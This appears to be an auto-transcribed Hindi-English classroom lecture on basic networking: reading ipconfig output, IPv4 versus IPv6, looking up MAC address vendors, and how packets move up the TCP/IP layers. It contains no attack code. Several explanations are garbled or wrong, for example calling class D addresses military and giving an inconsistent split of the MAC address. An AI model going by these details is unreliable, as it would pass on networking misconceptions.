Now, so here what we have is, this is your command line representation of your IP configuration. If you want to check it graphically, you can right click here on your network, okay, and you can simply go to Open Network and Sharing Center, okay. As soon as you click here, you will get a graphical window here. On this graphical window, all your connection properties, your connection information will be managed, okay. We'll see individual information which is of our interest. Now, so what we'll do, now here there is an option known as change adapter settings, okay. Everybody can see this, change adapter settings, सबके कंप्यूटर में है. Now once you click on this change adapter settings, you can see that you have all your individual networks available here, okay. So these networks are represented graphically here, but above they are represented in form of command line, okay. यहाँ पे command line format पे और यहाँ पे graphical है, ठीक है. Now let's go a little down. अब सबसे पहले मैं देख रहा हूँ जो मेरा यहाँ पे अडाप्टर डिस्प्ले कर रहा है, that is wireless LAN adapter network connection 5, okay. This is command line and here it is displayed as graphically wireless network connection 5, okay. Clear? अब आप देख सकते हैं यहाँ पे दो इन्फॉर्मेशन है. पहली इन्फॉर्मेशन तो ये है कि दैट इज अ वायरलेस LAN अडाप्टर, ओके, एंड सेकेंड इन्फॉर्मेशन इज द नेम इज वायरलेस नेटवर्क कनेक्शन 5, okay, clear? Now you can see that the media state is disconnected at the moment, and here you can see that it's displaying it's not connected. It is fine. Now let's come to the second point, wireless network connection 4. If you go a little down here, you can see that your wireless network connection 4 has some information, ठीक है. क्या इंफॉर्मेशन है? दिस इज द IPv6 एड्रेस, ओके. द क्वालिटी ऑफ एन IPv4 एड्रेस इज इट इज 128 बिट एड्रेस, ओके. व्हाट डज दैट मीन? आई विल टेल यू. इंक्रिप्शन इज अदर थिंग, ठीक है, इंक्रिप्शन नहीं. नाउ लेट्स अंडरस्टैंड, ठीक है. IPv6, okay. What does this IPv6 means? This IPv6 is a 128-bit binary address, okay. Binary, you understand what does that mean? Binary is 0,1, okay, clear? 0, 1 is binary. 128 bits of binary means if you start from 0, this could be a minimum number, okay. Let's say these are 128 bits, 0 0 0 0 0 0 करके ऐसे करके ये 128 बिट्स है मान लो, ठीक है. इन द सेम वे द मैक्सिमम वैल्यू कुड बी समथिंग लाइक दिस, ओके, एंड दीज शुड बी आल्सो 128 बिट्स. अब इन दोनों वैल्यूज के बीच में कुछ भी कॉम्बिनेशन हो सकता है 1 और 0 का, ठीक है. तो दीज मेनी IP एड्रेसेस आर पॉसिबल. तो कितने होते हैं एक्चुअली? लेट्स कंप्यूट. वी कैन यूज कैलकुलेटर टू कंप्यूट कि एक IPv6 एड्रेसेस कि अगर हम स्कीम फॉलो करते हैं तो ऑल ओवर द वर्ल्ड कितने इंडिविजुअल IP एड्रेसेस होंगे, ओके. लेट्स से सो इफ यू ओपन कैलकुलेटर, व्हाट यू हैव टू डू इज वंस यू ओपन द कैलकुलेटर में आपको साइंटिफिक कैलकुलेटर सेलेक्ट करना पड़ेगा, तब आप ये कंप्यूट कर पाएंगे, ठीक है. नॉर्मल कैलकुलेटर में ऑप्शन अवेलेबल नहीं है. सो सेलेक्ट योर साइंटिफिक कैलकुलेटर एंड नाउ वी विल कंप्यूट नंबर ऑफ पॉसिबल IPv6 एड्रेसेस इन द वर्ल्ड, ओके. So in order to do that, you have to take binary. It could be a combination of 0 and 1. So we will select 2, okay. And total number of combinations per bits 128. So it should be something like total number of IPv6 addresses possible equal to 2 raised to the power 128, okay. And it will be around, let's compute, 2 raised to the power, x raised to the power y is something like wherein you can put in x as a value and y as a value as well. So 2 raised to the power y. Y means 128. Okay. If we compute, okay,
So these many addresses are possible. So it's like more than billions, मतलब a very big value, ठीक है ना? So these many IP addresses are possible and this conveys an information कि अब दुनिया में कितने भी कंप्यूटर्स हों, सबको IP addresses अवेलेबल हो जाएंगे for years, okay? तो कोई भी कनेक्ट हो सकता है इंटरनेट के ऊपर. Hence today we need IPv6 addresses, okay? क्यों इसका इवोल्यूशन हुआ था IPv6 एड्रेस का, वो भी मैं बताता हूँ. IPv6 से पहले जो एड्रेसेस थे वो क्या थे? IPv4 एड्रेसेस थे, ठीक है. IPv4 एड्रेसेस में एक बात थी, क्या? IPv4 एड्रेस इज अ 32 बिट एड्रेस ऑफ बाइनरी, which means 2 raised to the power 32, and total number of possible IP addresses possible would be, let's calculate, 2 raised to the power 32. That is these many IP addresses. So all these IP addresses are booked. इसमें भी कुछ E क्लास के थे इमरजेंसी के लिए, कुछ D क्लास के लिए थे मिलिट्री जोन्स के लिए. You were able to use only A, B and C. Okay? तो टोटल इतने नंबर ऑफ IP एड्रेसेस में भी सारे अवेलेबल नहीं थे, खत्म हो गए सारे के सारे IPv4 एड्रेस, ठीक है. इतने लोग बढ़ गए, इतनी डिवाइसेस हो गई, इतने कंप्यूटर्स हो गए कि खत्म हो गई ये वैल्यू, ठीक है. अब जो वैल्यू है वो क्या है, और ज्यादा चाहिए तो उन्होंने उसको IP वर्जन 4 से IP वर्जन 6 कर दिया. प्रोटोकॉल का पूरा स्कीमा चेंज कर दिया. 32 बिट से उन्होंने IP एड्रेस को उठा के 128 बिट के पैकेट में कन्वर्ट कर दिया, ठीक है. बीच वाले वो नाम उन्होंने नहीं दिया IPv5, दे हैव जस्ट कंप्यूटेड इट एज IPv6. अब उसके पीछे क्या नेमिंग कन्वेंशन की थ्योरी है, दैट वी हैव टू गो फॉर गूगल, ओके, कि IPv6 ही नाम क्यों रखा. आई एम नॉट फॉलोइंग दैट, तो इसलिए मुझे अभी पता नहीं, ठीक है. वी हैव टू चेक दैट कि IPv6 क्यों रखा नाम, ठीक है. क्लियर? नाउ लेट्स सी. सो वंस वी आर डन विद दिस, वी ओनली हैव टू अंडरस्टैंड दीज टू इंफॉर्मेशन. क्या? IPv6 addresses have 128 bit address, okay, so that means 128 raised to the power 2 raised to the power 128 could be the possible number of combinations, and all over the world, it means all over the universe can connect to a network, okay. Now let's come to the next point. तो यहाँ पे जो आपके कंप्यूटर में स्टैक हैं, TCP/IP स्टैक है, जो भी हार्डवेयर आपके कंप्यूटर में कनेक्टेड हैं, ये लाइन ये डिस्प्ले कर रही है कि वो IPv6 को सपोर्ट करते हैं, ठीक है. क्लियर? यानी आपके कंप्यूटर में जो नेटवर्क अडेप्टर लगा है, कल को अगर IPv6 एड्रेस पे आपको स्विच करना होगा तो आपको एडिशनली कोई हार्डवेयर परचेज करने की जरूरत नहीं पड़ेगी. आपके प्रोटोकॉल्स इंप्लीमेंटेड हैं कंप्यूटर्स के अंदर ऑलरेडी, ठीक है. क्लियर? नाउ लेट्स कम टू द नेक्स्ट पॉइंट. सो हियर इज द रिप्रेजेंटेशन. आप देख भी सकते हैं यहाँ पे रिप्रेजेंटेशन क्या है. इट्स अ अल्फा, मतलब हेक्साडेसिमल नोटेशन यूज होती है IPv6 एड्रेस में, जबकि IPv4 एड्रेस में डेसिमल नोटेशन यूज होती है, ठीक है. हेक्साडेसिमल मींस अ वैल्यू कुड बी फ्रॉम A to F, 0 to F could be possible, but on decimal numbers only 0 to 9 could be possible, ठीक है. तो these are two basic differences between IPv4 and IPv6. IPv4 क्या है? It's a 32 bit address of binary. IPv6 क्या है? It's a 128 bit address of a binary. On IPv6 you can use hexadecimal notation. IPv4 में decimal notation. This is the two main unique differences, ठीक है. And why do you actually need IPv6 addresses? Because IPv4 addresses are obsolete. They are finished. हाँ, तो अभी हम लोगों के पास है ना, पहले से हम इतने टाइम से इंटरनेट यूज कर रहे हैं, हमारे जो इंटरनेट सर्विस प्रोवाइडर्स हैं उनके पास IP एड्रेसेस हैं, उनके पास ऑलरेडी हैं. अब जो नए आ रहे हैं, ठीक है ना, जो नए डिवाइसेस बनेंगे, जो नई चीजें आ रही हैं, उनको सब IP की एड्रेसेस पड़ेगी. अब जैसे कोई नए सर्वर्स बुक हो रहे हैं, ठीक है, आपके पास एक वेबसाइट है something.com. अब something.com का एक IP एड्रेस है. अब सब लोगों ने बुक कर लिए, सबके बुक हो गई वेबसाइटें. अब जो नई वेबसाइटें बन रही हैं वो कहां जाएंगे? उनको भी डेडिकेटेड सर्वर चाहिए. तो नाउ दे आर स्विचिंग टू IPv6 एड्रेसेस, क्योंकि उनके पास अवेलेबल ही नहीं है IP. हाँ, लिमिटेशंस और कुछ नहीं है.
ठीक है, स्पीड प्रोटोकॉल बेहतर है तो IPv6 बेटर होगा। वो हाँ, वो तो नेटवर्क प्रोटोकॉल एक्सचेंज बेहतर है, एडवांस्ड है, ठीक है। नाउ कहाँ पे ये एक्चुअली वो ये रिप्रेजेंट कर रहा है कि उसका सबनेट मास्क क्या है, वो क्या होता है मैं भी आपको बताऊंगा, ठीक है। नाउ लेट्स से सो हियर यू आर ऑन अ IPv4 एड्रेस। अभी जो हम नेटवर्किंग समझेंगे हम IPv4 एड्रेसेस के बेसिस पे ही समझेंगे, ठीक है, क्योंकि अभी जो करंट मॉडल है, इम्प्लीमेंटेड मॉडल इज IPv4, बट फ्यूचर में इट मे बी पॉसिबल दैट यू विल बी स्विचिंग टू IPv6, ओके। नाउ सो now what you have is you have another IPv4 address and this is 192.160.43.234 for my case, okay। नोट कर लीजिए आप लोग अपने अपने IP एड्रेसेस, मेरा भी नोट कर लो और अपना भी नोट कर लो एक नोटपैड पे, ठीक है। So you all have to check your IP address using which you are connected through your wireless LAN adapter on your wireless network connection। गलत उसका IP मत देना, ठीक है, क्योंकि अब अगर आप नीचे देखोगे तो आप देखोगे ईथरनेट अडेप्टर भी है, ठीक है ना, ईथरनेट का VMware अडेप्टर भी है, तो देयर आर मल्टीपल IP एड्रेसेस अलॉटेड टू इंडिविजुअल अडेप्टर्स, बट यू हैव टू आइडेंटिफाई द IP एड्रेस ऑफ द अडेप्टर थ्रू विच वी आर कनेक्टेड टू क्रूजर एट द मोमेंट, ओके, ठीक है, समझ रहे हो। तो आप यहां से आइडेंटिफाई कर सकते हो कि आपका क्रूजर नेटवर्क कौन सी प्रोफाइल या कौन से सॉफ्टवेयर अडेप्टर पे कनेक्टेड है, और फिर उसी सॉफ्टवेयर अडेप्टर की प्रॉपर्टीज आपको कमांड प्रॉम्प्ट से चेक करनी है, और वो चेक करने के बाद में आपको अपनी ये तीनों इंफॉर्मेशन सेव करनी है, IPv4, सबनेट मास्क एंड डिफॉल्ट गेटवे। और ये क्या चीज है वो मैं भी आपको बताऊंगा। हाँ, मेरे भी तीनों इंफॉर्मेशन नोट कर लो, आपको अपनी और मेरी ये तीनों इंफॉर्मेशन सेव करनी है। ये तीनों ही इंफॉर्मेशन इंपॉर्टेंट है नेटवर्क में कनेक्टेड रहने के लिए और कम्युनिकेट करने के लिए। हाँ, तो जो इसमें दिखा रहा है वो आप एक बार देख लीजिए। ऐसा हो सकता है पॉसिबिलिटी कि अडेप्टर ना हो बेसिकली। राइट क्लिक, सेलेक्ट मार्क, मतलब राइट क्लिक करके मार्क पे पहले सेलेक्ट करना, मार्क से फिर ऐसे डायरेक्टली सेलेक्ट कर लो और उसके बाद में राइट क्लिक करके कॉपी। जब राइट क्लिक करोगे अपने आप कॉपी हो जाएगा। Ctrl+C Ctrl+V वोंट वर्क। क्यों ऐसे हो जाए? राइट क्लिक करोगे कॉपी हो गया। नहीं, आप ऐसा करो ना, देखिए सुनो, यू हैव टू सेलेक्ट ऑन मार्क, you have to select this information, right click and it will be copied. Now you can go to your notepad and you can right click and paste. Okay, so this is your information which has to be Ctrl+C Ctrl+V नहीं होगा। आपने ओपन किया अपना ये, राइट क्लिक किया, मार्क किया, हाँ नोट कर लो, आपने सेलेक्ट कर लिया अपना वो, और बस सिर्फ आपको राइट क्लिक करना है, ऑटोमेटिकली कॉपी हो जाएगा इसके ऊपर। सिर्फ राइट क्लिक किया ना, कॉपी हो जाएगा, ऐसे कॉपी हो गया। अब कॉपी करने के बाद में आप यहाँ आओगे, राइट क्लिक करोगे, पेस्ट करोगे, पेस्ट हो जाएगी। ये है, नहीं वो दैट इज नॉट क्लियर। क्लियर। अब आपको अपने आईपी एड्रेसेस पता चल गए और मेरा भी आईपी एड्रेस पता चल गया। अब आप ये देख सकते हैं इन तीन प्रॉपर्टीज में एवरी मशीन हैज अ डिफरेंट आईपी एड्रेस, ओके।
but they have same subnet mask and same gateway. ओके, ऐसा क्यों है वो मैं अभी बताता हूँ. ठीक है, आईपी एड्रेसेस सबको अपने अपने पता चल गए इंडिविजुअल. नाउ लेट्स कम टू द नेक्स्ट पॉइंट. अभी जो 2 मिनट पहले मैंने आपसे कहा था कि नेटवर्क के अंदर जो लेयर्स होती हैं, ठीक है, अगर हम टॉप से बॉटम अगर देखते हैं तो यहां पे अगर आप देखोगे फिजिकल लेयर के बाद में एक डेटा लिंक लेयर है, अभी हमें मैक एड्रेस नहीं पता. उसके बाद में नेटवर्क लेयर है, वो हमें पता चल गया. ठीक है, उसके ऊपर ट्रांसपोर्ट लेयर है और एप्लीकेशन लेयर, इसके बारे में भी हमें कुछ नहीं पता अभी. ठीक है, तो अब मेरा एक क्वेश्चन है कि आईपी एड्रेस आइडेंटिफाई करना तो मुझे पता है, बट हाउ विल आई आइडेंटिफाई मैक एड्रेस ऑफ अ डिवाइस. ओके, लेट्स अंडरस्टैंड हाउ. टू आइडेंटिफाई मैक एड्रेस ऑफ अ डिवाइस, this is task number 2. Task 2. Check MAC address of your network adapter. Okay, and you can also call it as NIC, and NIC actually stands for Network Interface Card. Okay, using this card you will be able to connect to your network. Now, so how will we identify that? Yes, you will be using CMD, and on the CMD, using run as administrator, you're going to execute the command ipconfig/all. It will give you detailed information, and what you have to check the physical address of NIC, of your network interface card. Okay, the physical address will be your MAC address. Whenever you will be hacking into a computer, or whenever you will be tracking an attacker who intruded into your client's computer, you will be searching him from his MAC address. Okay, using MAC address only you can prove that this guy has hacked into your network. Okay, and using this MAC address you can track him as well. How can you track it? Let me just tell you. Let's say on the logs or by some means you got some information that you have got the MAC address of the attacker. Okay, now what you will do, MAC address contains some important information. Okay, it includes information of the manufacturer and the unique ID of the device. Okay, so once you have got the manufacturer, you can send him your MAC address and you can ask him that in which area he has distributed this particular ID based device. तो उन्हें पता चल जाता है कि नियरेस्ट डीलर कौन सा है जहां पे ये डिवाइस गई है. चेन होती है पूरी, इजिली यू कैन आइडेंटिफाई. वंस यू हैव रीच्ड टू द फाइनल चेन, एंड ऑफ द चेन, टू द रिटेलर, आप उससे पूछ सकते हैं, या इफ यू हैव अ पुलिस केस और पुलिस वेरिफिकेशन, तो पुलिस कैन इंटेरोगेट देम एंड आस्क कि ये बिल, इस आईडी के लिए आपने जो बिल काटा है वो किसके लिए काटा है. आपकी दुकान में कोई स्नैपशॉट्स हैं या स्क्रीन कैप्चर्स हैं, कैमरा कैप्चर्स हैं, तो गिव दैट रिकॉर्डिंग सो दैट वी कैन आइडेंटिफाई कि कौन सा आदमी आया और कौन सा बिल लेके गया. ठीक है, क्लियर, समझ गए. इसलिए नेटवर्क बेस्ड डिवाइसेस इट इज प्रेफर्ड कि वो बिल्ड हो. ओके, ताकि आप उन डिवाइसेस को ट्रैक कर सकें. Who has purchased the devices? Clear? Now, let's come to the next one. So, let's understand first how to compute the MAC addresses. So, let me just do a clear statement. Okay. And now what am I going to do? I'm going to do ipconfig/all. Okay. As soon as I did that, ipconfig/all. ठीक है. Yes, every device will have its own logical address and a unique physical address. Okay, clear? हाँ, that means you have connected to some network and now that network is making connections for you. So the end user is getting IP address of that network instead of your physical machine address. Okay, clear?
समझ गए? हाँ, वायरलेस अडेप्टर हो, चाहे ईथरनेट अडेप्टर हो, चाहे किसी भी फॉर्मेट का अडेप्टर हो, every adapter will have its unique physical address and a logical IP address. Logical IP address seems to be dynamic, they change. ठीक है, आपने दिन में कनेक्ट किया तो कुछ और IP मिल गया, शाम को कनेक्ट किया कुछ और IP मिल गया, दोपहर में कनेक्ट किया कुछ और IP मिल गया. It could be possible. Okay, depends on the settings of your IP configurations. But physical address of the device will always be same. Now, so once I have did IP configuration check again, so on my wireless network connection 4, you can see that this time when I used all option, I've got a lot of information. Okay, first thing, I've got name of the wireless adapter. So you can see that the device using which I'm connected is a Realtek RTL8187 wireless device which follows 802.11 wireless LAN protocol for BNG networks. Okay, it can operate up to 54 Mbps and it's a USB 2.0 network adapter. यानी जो data exchange rate है, it's connected via USB. It's not an internal adapter. ठीक है, मेरा internal नहीं है, आप लोगों का internal होगा. ठीक है. Now, the next thing, physical address of this device. So ये BNG का मतलब क्या है? BNG वायरलेस के इंडिविजुअल प्रोटोकॉल्स हैं टू कनेक्ट टू अ स्पेसिफिक ब्रांड ऑफ नेटवर्क. क्या होते हैं डिटेल में आगे हम समझेंगे जब हम वायरलेस पढ़ रहे होंगे. ठीक है. नाउ फिजिकल एड्रेस. फिजिकल एड्रेस में आप देख सकते हैं इट हैज 12 कैरेक्टर्स. ओके, इन 12 कैरेक्टर्स में जो पहले 6 कैरेक्टर्स हैं, दीज आर मैन्युफैक्चरर्स आइडेंटिफायर. ओके, और जो बाकी 6 हैं, दिस इज यूनिक आईडी ऑफ अ डिवाइस. ओके, क्लियर? नाउ इन केस लेट्स से इफ आई सर्च फॉर दिस वैल्यू 00COCA and if I go to Google, okay, and if I search for this on internet, let's say I'm trying a wild example on Google. I'm going to save it 000C0CA. Okay, you can see that it is saying Mac find search results for your MAC address or something, or you can say you can go for a vendor lookup here, base64 online MAC address.php and provided by the number. Okay, so now I am searching for the vendor lookup for my MAC address. Okay, I've clicked on this information. ठीक है, दोनों सर्च कर सकते हैं आप. सो व्हाट यू कैन डू इज, लेट्स से जैसे ही आपने इसको डाल दिया, सर्च किया और आपको मिल गया दिस डिवाइस इज मेंटेन्ड बाय अल्फा इंक्लूसिव. ओके, क्लियर? अब आप एक काम कर सकते हैं, उठ के आके आप देख सकते हो, दैट्स एन अल्फा कार्ड. उठ के आओगे, लिखा हुआ है डिवाइस के ऊपर, इट्स एन अल्फा कार्ड. ठीक है, तो जो पहली 3 चीजें हैं ऊपर ही लिखा हुआ है डिवाइस के ऊपर, इट्स एन अल्फा नेटवर्क डिवाइस. ओके, मेरा सर वेंडर नेम अलग आ रहा है. तुम्हारा वेंडर नेम एक्चुअली यही वेंडर होगा जो आ रहा है, क्योंकि मैक मैन्युफैक्चरर का आईडी एक ही होता है. हो सकता है कि कोई कंपनी, क्या होता है, कंपनियां ना दूसरे प्रोडक्ट मैन्युफैक्चरर्स के प्रोडक्ट लेके अपना ठप्पा लगा के आगे बेच देती. तो जैसे तुम्हारा डेल का मशीन है या HP का मशीन है, तो HP अपने वायरलेस तो बना नहीं रही. ठीक है ना, मेरा सोनी का कंप्यूटर है बट मेरा कार्ड तो अल्फा का है, तो अल्फा का ही मैन्युफैक्चरर आईडी मुझे डिस्प्ले होगा. सर ऐसे ब्रॉडकॉम का है, पूरा वो उसका नाम पता चल गया. हाँ, सर वो करना तो ब्रॉडकॉम. अब ब्रॉडकैम कंपनी से आप कम्युनिकेट करोगे और उससे पूछ लोगे कि भाई साहब आपका जो ये प्रोडक्ट है उसमें ये वाली आईडी आपने कहाँ भेजी है, कौन से कंट्री में गई है, और फिर वो कहाँ डिस्ट्रीब्यूट हुई, उस कंट्री में कौन से डिस्ट्रीब्यूटर के पास गई, फिर उस डिस्ट्रीब्यूटर से कौन से रिटेलर्स के पास गई.
है ही प्रोसेस, बिल्कुल। जब आपका फ़ोन ख़राब होता है सर्विस सेंटर पे देते हो तो वो कैसे चेक करते हैं उसकी वारंटी? डिवाइस आईडी से ही चेक करते हैं ना, या बिल से चेक करते हैं, ठीक है ना, कि बिल डेट क्या है। बट वो एक्चुअली बिल डेट से भी नहीं, वो डिवाइस आईडी से चेक करते हैं। बिल से आपकी डिवाइस की वो लेते हैं और उसकी लॉग इन्फॉर्मेशन चेक करते हैं। तो प्रोसेस तो है ही लंबा। नहीं नहीं, वो ट्रैक नहीं करते हैं, वो दूसरे का नेटवर्क हैक करके ट्रैक करते हैं। मूवी में तो ये भी दिखाते हैं शाहरुख खान इतनी बड़ी बिल्डिंग से कूद गया नीचे, असलियत में थोड़ी कूद सकता है। मूवी में तो दिखा देते ना धूम वाला आमिर खान कैसे नोट निकाल के बिल्डिंग से दौड़ता हुआ चला आ रहा है, लेकिन ऐसा असलियत में नहीं होता। क्या नहीं, अब उनकी भी आईडीज आर मेंटेन्ड एट देयर कंप्यूटर्स, ठीक है। लेट्स से आई एम अ हैकर, तो इफ आई कैन हैक इनटू योर मशीन आई कैन हैक इनटू देयर नेटवर्क एज वेल, उसमें कौन सी बड़ी बात है, ठीक है ना। जैसे मैक तो यूजुअली मुश्किल ही होता है किसी कंप्यूटर पे निकालना, आईपी गलत है तो आईपी से तो कुछ लोग ऐसे लोकेशन ट्रेस कर लेते हैं। मैक भी निकाल सकते हो, जब तुमने सामने वाले का मशीन हैक कर लिया तो तुम सब कर सकते हो, सिखाएंगे ना, तुम्हें टेंशन क्यों अरे हम तुम्हें सब बताएंगे कैसे निकाल सकते हैं, टेंशन क्यों ले रहे हो, ठीक है। नाउ यही क्यूरियोसिटी चाहिए। नाउ आओ देखो, अब क्या है, you will get the unique ID. So now you know that you have a MAC address as well on your machine and you know how to check it. Clear? Let's come to the point. Now here what we have is, let's say आप लोग अपने अपने MAC addresses save कर लीजिए. So I have just copied my MAC address and I am keeping my MAC address information here. So this is the MAC address of my device. MAC address. Okay? इधर देखो, डिस्टर्ब मत हो, इधर देखो, इधर कंप्यूटर पे कुछ गलत कॉपी कर दिया होगा। कोई बात नहीं, डायरेक्टली नोट कर लो, क्या टाइम खराब कर रहे हो ऐसी छोटी छोटी चीज़ों के लिए, ठीक है ना। अच्छे पूरे पैसे दिया करो कंप्यूटर खरीदते समय, मत डिस्काउंट मत लिया करो, राइट क्लिक खराब हो जाएगा ना, ठीक है। सो यू हैव गॉट अ मैक एड्रेस एज वेल. So now you know the first 6 characters defines manufacturer ID and last 3 characters define product ID. Clear? Now, so at the moment what you know about your computer network is, if we talk about from bottom layer to top layer, let's say मैं अब आपको बताता हूँ, ठीक है। Let's say हमारे पास 2 devices हैं. This device belongs to my machine. Let's say देवांशु, ठीक है। दूसरी तरफ एक और डिवाइस है, लेट्स से हम डेमो ले लेते हैं। क्या है आपका नाम बताइए? सौरभ, ठीक है, क्लियर। अब दोनों डिवाइसेस की इंडिविजुअल इंफॉर्मेशन है, लेट्स सी क्या इंफॉर्मेशन है। सबसे पहली लेयर है एप्लीकेशन। अब मैं टॉप डाउन अप्रोच यूज करूँ, ठीक है। एप्लीकेशन से नीचे आएगी आपकी ट्रांसपोर्ट से नीचे आएगी आपकी नेटवर्क लेयर, और नेटवर्क से नीचे आएगी आपकी डेटा लिंक लेयर, ठीक है। सबसे नीचे तो फिजिकल होती ही होती है, विच कन्वर्ट सिग्नल्स इनटू डेटा एंड डेटा इनटू सिग्नल्स। वी आर इग्नोरिंग इट। अब हम जो डिस्कस कर रहे हैं वो प्रैक्टिकल मॉडल डिस्कस कर रहे हैं जो एक्चुअली इंप्लीमेंटेड होता है नेटवर्क्स के अंदर। वी कॉल इट एज टीसीपी एंड लेयर 4 मॉडल। ना इस लेयर 4 मॉडल में सिर्फ 4 लेयर्स होते हैं, ठीक है। डेटा लिंक लेयर, नेटवर्क लेयर, ट्रांसपोर्ट लेयर एंड एप्लीकेशन, ठीक है। फिजिकल लेयर को हम इग्नोर कर रहे हैं ना, वो तो ऑटोमेटिक हार्डवेयर है, हम सिर्फ सॉफ्टवेयर से रिलेटेड काम कर रहे हैं, ठीक है ना। उसमें तो पता ही चल गया ना आपको, एडीसी डीएसी होते हैं, वहां पे कुछ काम नहीं होता खास, वो इलेक्ट्रिकल डिजाइनर्स का काम है, कंप्यूटर डिजाइनर्स का काम नहीं है। फॉर सॉफ्टवेयर प्रोफेशनल्स यू हैव टू फोकस ऑन ओनली दोज 4 लेयर्स। एज अ साइबर सिक्योरिटी कंसल्टेंट, एज अ साइबर सिक्योरिटी प्रोफेशनल, you have to focus on these 4 layers only. Okay, now so let's say we have a data link layer as well. Now so data link layer पे क्या होता है? MAC एड्रेस होता है। आपको अपना MAC एड्रेस मालूम है? मालूम है, मेरे को भी मालूम है।
तो लेट्स से जस्ट फॉर रेफरेंस आई एम यूजिंग द लास्ट कैरेक्टर ऑफ माय मैक एड्रेस, रेफरेंस के लिए सिर्फ, ठीक है। तो मेरा जो मैक है वो है B7, आपका 95 जो भी है, ठीक है। एंड नेटवर्क लेयर पे मेरे को पता है मेरा क्या आईपी एड्रेस है, मेरा आईपी एड्रेस है 192.168.43.234, 192.168.43.234. This is my IP address. Now I have to understand what port number is and what application is. अभी इसके बारे में मुझे नहीं पता, ठीक है, लेकिन बाकी इंफॉर्मेशन मुझे पता है। डेटा लिंक लेयर पे क्या होगा, मैक एड्रेस होगा। In case if I have received a packet who is destined for my MAC address, I'm going to accept the packet. Otherwise, I'm going to drop the packet. ठीक है? If I have accepted the packet, I will forward the packet to network layer, and on network layer, I will ask to check whether this packet belongs to this IP address or not. If I have that logical IP address, I'm going to accept the packet. Otherwise, I'm going to drop the packet. If I have accepted the packet, I will forward the packet to the transport layer, where it will be checked कि कौन से पोर्ट नंबर पे कनेक्शन बनाना है, ठीक है। वो क्या चीज होती है अब बताता हूं आपको, ठीक है। तो अब यहां पे अगर आप देखोगे तो दोनों लेयर्स में आपके पास एक एप्लीकेशन लेयर है, आपको भी अभी नहीं पता कि आपकी एप्लीकेशन लेयर क्या है, ठीक है ना, और उस पर क्या हो रहा है। नेक्स्ट कम टू द नेक्स्ट पॉइंट, ट्रांसपोर्ट लेयर, यहां पे क्या है ये भी आपको नहीं पता। नेटवर्क लेयर पे आपका क्या आईपी एड्रेस है वो आप जानते हैं, ठीक है। क्या है आपका आईपी एड्रेस बताना सौरभ? 87, ओके। एंड डेटा लिंक पे आपके पास क्या है? लास्ट 95, ठीक है। क्लियर हो गया, समझ में आ गया। अब जब हम दोनों आपस में बात कर रहे होंगे, अपने कंप्यूटर्स को एक दूसरे से हमने कनेक्ट कर रखा होगा, तो होगा क्या, he will send a packet to me using ADC and DAC. I am going to receive the packet. Then I'll forward the packet to my data link layer. I'm going to check whether the packet which I have received belongs to my MAC address or not. If it is, then I'm going to accept it. Otherwise, I'm going to drop it. इसका मतलब नेटवर्क में जितने भी पैकेट्स ट्रेवल कर रहे होंगे वो सारे एक बार मेरे पास जरूर आएंगे, बट वो मेरे प्रोटोकॉल डिसाइड करेगा कि क्या मुझे इसे एक्सेप्ट करना है या नहीं। डेटा लिंक लेयर वो तो थर्ड लेयर पे पहुंच गया ना, अभी तो सबसे पहला नीचे वाला लेयर, ठीक है ना। अब मैक एड्रेस चेक होगा, हाँ मैं रिसीवर की बात कर रहा हूं। रिसीवर में सबसे पहले पैकेट रिसीव होगा सिग्नल्स, फिर वो सिग्नल कन्वर्ट होंगे डिजिटल में, फिर वो डिजिटल में पहले आप मैक चेक करोगे, फिर मैक अगर एक्सेप्ट होगा फिर आप आईपी चेक करोगे, आईपी अगर एक्सेप्ट होगा तो आप ट्रांसपोर्ट चेक करोगे कि पोर्ट ओपन है या नहीं। अगर पोर्ट ओपन होगा तो फिर आप एप्लीकेशन को डेटा ट्रांसफर कर दोगे, फिर एप्लीकेशन पे वो डेटा डिस्प्ले हो जाएगा, ठीक है। और ये एप्लीकेशन डिसाइड करेगी कि मुझे एप्लीकेशन डेटा को कैसे डिस्प्ले करना है या कैसे यूज करना है। अभी आपको बताता हूँ आगे डिटेल में, ठीक है। ये बात क्लियर हो गई। तो जब आप पैकेट रिसीव करोगे, योर मैक लेयर इज द मोस्ट इंपॉर्टेंट लेयर विच इज रिस्पॉन्सिबल टू अंडरस्टैंड वेदर यू विल बी रिसीविंग पैकेट्स और नॉट, ठीक है। आप लोग जो हैं यूजर्स वो एप्लीकेशन के ऊपर काम करते हैं, बट एक्चुअल जो नेटवर्किंग है वो प्रोटोकॉल के ऊपर काम करती है, ठीक है। कैसे होता है अब आगे बढ़ते हैं, समझ में आ गया ये। आप देखो अब क्या है, सबसे पहले जब भी हम एक्चुअली प्रैक्टिकल कम्युनिकेशन करते हैं, ठीक है, ऑन प्रैक्टिकल कम्युनिकेशंस, ठीक है। तो मुझे एक चीज बताओ, इसमें से कौन सी चीज तुम्हारे लिए आसान होगी याद करना। जैसे 192.168.1.43. जो भी आपका है 87, ये है आपका आईपी एड्रेस जो डायनेमिक है, आप कहीं भी जाते हैं नेटवर्क देते हैं, कनेक्ट हो जाते हैं, ठीक है। दिस इज कंपेरेटिवली मोर इजी टू रिमेंबर देन योर मैक एड्रेस, ठीक है। मैक एड्रेस से ज्यादा आसान है, तो इसलिए जनरली जो कम्युनिकेशन होता है वो आईपी एड्रेस के बेसिस के ऊपर होता है, ठीक है। अब देखो प्रैक्टिकल कम्युनिकेशंस में क्या होता है, व्हाट यू विल डू ऑन स्टेप 1, कनेक्ट टू एन आईपी एड्रेस, ओके, फर्स्ट स्टेप। इसमें क्या होता है, ए आरपी पैकेट विल बी जनरेटेड to check
